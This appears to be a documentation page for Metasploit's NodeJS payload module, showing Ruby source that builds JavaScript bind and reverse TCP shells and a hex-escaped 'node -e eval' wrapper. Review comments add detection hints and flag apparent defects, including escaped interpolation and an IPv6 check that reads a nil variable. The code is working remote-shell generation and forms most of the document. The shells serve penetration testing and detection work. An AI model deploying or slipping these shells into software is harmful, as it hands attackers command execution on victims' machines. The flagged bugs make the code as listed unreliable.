Module: Msf::Payload::NodeJS

Defined in:
lib/msf/core/payload/nodejs.rb

Instance Method Summary

Instance Method Details

#nodejs_bind_tcp ⇒ String

Outputs a javascript snippet that spawns a bind TCP shell


# File 'lib/msf/core/payload/nodejs.rb', line 7

# Builds the JavaScript source for a bind TCP shell and returns it flattened
# to a single line.
#
# The embedded script resolves `require` (falling back to
# global.process.mainModule.constructor._load), selects "cmd" when
# process.platform matches /^win/i and "/bin/sh" otherwise, and creates a
# net server whose connection handler spawns that shell and connects its
# stdin, stdout and stderr to the accepted socket.
#
# Review notes:
# - The script contains no authentication step, and listen() is given only a
#   port, so whoever can reach that port gets the shell. On the host this
#   shows up as a node process holding a listening socket and parenting a
#   cmd or /bin/sh child.
# - NOTE(review): in this listing the port appears as `\#{datastore['LPORT']}`.
#   Inside a double-quoted literal the backslash suppresses interpolation, so
#   the text would be emitted verbatim. The file on disk may use a heredoc
#   that this rendering has re-escaped; confirm against
#   lib/msf/core/payload/nodejs.rb.
#
# @return [String] single-line JavaScript with single quotes backslash-escaped
def nodejs_bind_tcp
  cmd = "(function(){\nvar require = global.require || global.process.mainModule.constructor._load;\nif (!require) return;\n\nvar cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\";\nvar net = require(\"net\"),\ncp = require(\"child_process\"),\nutil = require(\"util\");\n\nvar server = net.createServer(function(socket) {\nvar sh = cp.spawn(cmd, []);\nsocket.pipe(sh.stdin);\nutil.pump(sh.stdout, socket);\nutil.pump(sh.stderr, socket);\n});\nserver.listen(\#{datastore['LPORT']});\n})();\n"
  # Flatten for use as one command-line argument: drop newlines, collapse
  # whitespace runs to one space, then put a backslash before each single quote.
  cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
end

#nodejs_cmd(code) ⇒ String

Wraps the javascript code param in a “node” command invocation


# File 'lib/msf/core/payload/nodejs.rb', line 67

# Wraps JavaScript source in a `node -e` command line.
#
# The source is passed through Rex::Text.to_hex with a "\x" prefix and placed
# inside eval("...") within a single-quoted shell argument.
# NOTE(review): Rex::Text.to_hex is defined outside this file; presumably it
# renders every byte as \xNN, which would leave no single quote from `code`
# in the argument. Confirm against Rex.
#
# Detection note: because the script is hex-escaped, its text does not appear
# in the process command line. Process-creation rules should key on the
# `node -e` + eval("\x..") shape rather than on strings from the script body.
#
# @param code [String] JavaScript source to run
# @return [String] the `node -e '...'` command string
def nodejs_cmd(code)
  "node -e 'eval(\"#{Rex::Text.to_hex(code, "\\x")}\");'"
end

#nodejs_reverse_tcp(opts = {}) ⇒ String

Outputs a javascript snippet that spawns a reverse TCP shell

Options Hash (opts):

  • :use_ssl (Boolean)

    Use SSL when communicating with the shell. Defaults to false.


# File 'lib/msf/core/payload/nodejs.rb', line 34

# Builds the JavaScript source for a reverse TCP shell and returns it
# flattened to a single line.
#
# The embedded script resolves `require`, selects "cmd" or "/bin/sh" from
# process.platform, spawns that shell, and connects out to the configured
# host and port. Once connected, the socket is piped to the shell's stdin and
# the shell's stdout/stderr are pumped back to the socket.
#
# Review notes:
# - With :use_ssl the script loads "tls" instead of "net" and passes
#   {rejectUnauthorized:false}, so the peer certificate is not verified; the
#   channel is encrypted but the endpoint is not authenticated.
# - On the host this shows up as a node process with an outbound connection
#   that parents a cmd or /bin/sh child.
# - NOTE(review): in this listing the interpolations appear as `\#{...}`.
#   Inside a double-quoted literal the backslash suppresses interpolation;
#   the file on disk may use a heredoc that this rendering has re-escaped.
#   Confirm against lib/msf/core/payload/nodejs.rb.
#
# @param opts [Hash] options
# @option opts [Boolean] :use_ssl use SSL for the connection (default false)
# @return [String] single-line JavaScript with single quotes backslash-escaped
def nodejs_reverse_tcp(opts={})
  use_ssl = opts.fetch(:use_ssl, false)
  # Extra options argument for connect(); empty for a plain TCP connection.
  tls_hash = if use_ssl then '{rejectUnauthorized:false}, ' else '' end
  net_lib = if use_ssl then 'tls' else 'net' end
  # Intended to bracket an IPv6 literal for use as the host.
  # NOTE(review): the `lhost` passed to is_ipv6? is the local being assigned on
  # this same line, which is still nil here, so the check never inspects
  # datastore['LHOST'].
  lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
  # the global.process.mainModule.constructor._load fallback for require() is
  # handy when the payload is eval()'d into a sandboxed context: the reference
  # to 'require' is missing, but can be looked up from the 'global' object.
  #
  # however, this fallback might break in later versions of nodejs.
  cmd = "(function(){\nvar require = global.require || global.process.mainModule.constructor._load;\nif (!require) return;\nvar cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\";\nvar net = require(\"\#{net_lib}\"),\ncp = require(\"child_process\"),\nutil = require(\"util\"),\nsh = cp.spawn(cmd, []);\nvar client = this;\nclient.socket = net.connect(\#{datastore['LPORT']}, \"\#{lhost}\", \#{tls_hash} function() {\nclient.socket.pipe(sh.stdin);\nutil.pump(sh.stdout, client.socket);\nutil.pump(sh.stderr, client.socket);\n});\n})();\n"
  # Flatten for use as one command-line argument: drop newlines, collapse
  # whitespace runs to one space, then put a backslash before each single quote.
  cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
end